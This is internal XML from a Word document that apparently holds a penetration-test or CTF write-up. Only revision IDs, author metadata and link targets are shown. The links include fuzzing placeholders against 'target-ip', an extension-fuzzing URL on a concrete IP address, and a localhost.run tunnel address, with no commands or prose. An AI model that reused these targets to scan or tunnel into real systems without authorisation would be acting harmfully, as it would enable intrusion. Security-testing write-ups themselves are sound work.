    <w:rsid w:val="605016EB"/>
    <w:rsid w:val="606907D2"/>
    <w:rsid w:val="60F79E95"/>
    <w:rsid w:val="649758B9"/>
    <w:rsid w:val="65FB62DE"/>
    <w:rsid w:val="66422854"/>
    <w:rsid w:val="672608FC"/>
    <w:rsid w:val="6732AC10"/>
    <w:rsid w:val="6863A39D"/>
    <w:rsid w:val="6BFE1141"/>
    <w:rsid w:val="6C470A5F"/>
    <w:rsid w:val="6CB1480B"/>
    <w:rsid w:val="6ED3241F"/>
    <w:rsid w:val="6F96DEA5"/>
    <w:rsid w:val="717DE69A"/>
    <w:rsid w:val="7268B8F3"/>
    <w:rsid w:val="734F2445"/>
    <w:rsid w:val="75F5A0D8"/>
    <w:rsid w:val="76D0F817"/>
    <w:rsid w:val="76DD45F7"/>
    <w:rsid w:val="77CF1B2C"/>
    <w:rsid w:val="7B92DCCB"/>
    <w:rsid w:val="7B92DCCB"/>
    <w:rsid w:val="7C65439E"/>
    <w:rsid w:val="7C65439E"/>
    <w:rsid w:val="7E8240B9"/>
    <w:rsid w:val="7E91587A"/>
    <w:rsid w:val="7FDA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6EE2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F12AD087-1D12-4064-ACA0-DEDEDDB710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target-ip/robots.txt" TargetMode="External" Id="R044318e271b44731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target-ip/FUZZ" TargetMode="External" Id="Rfbad7843af6d4867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.142.139.230/index.php.$ext" TargetMode="External" Id="Re1352a56842f440e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="rId1473261772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId2080927268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId319408006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId307142517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId1704428425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId707918741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId1445554040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId1039133901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId883468747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId1999780054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId1221241836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="rId1393687466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="rId70971009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="rId485582643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="rId442784281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="rId1219597419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:nokey@localhost.run" TargetMode="External" Id="R3d86f47ee78b41c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://75fd02df267015.lhr.life" TargetMode="External" Id="R0cb626b33d034cd1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="rId1705017952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target-ip/" TargetMode="External" Id="R136732d7f2de4575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="rId2043062007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="rId166101938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="rId732439205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="rId2085794287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="rId1218751658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="rId1678744688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="rId1849286968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="rId1529876540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="rId1952427360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="rId8694296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d347efbf0fa47a191bee281d791a9ccb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6bc8e7651ff6d13ef7078ce5f5ec987e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29A43D6B-1460-44BB-AE40-DE5F28D53889}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{50C51601-EB8D-40A3-BD59-0FE61D45DB3F}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{163AC3EB-2E7C-489E-A2CA-A656AF66CD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aphiwit bunlom</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>aphiwit bunlom</lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-18T03:42:58.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-21T03:35:24.9533973Z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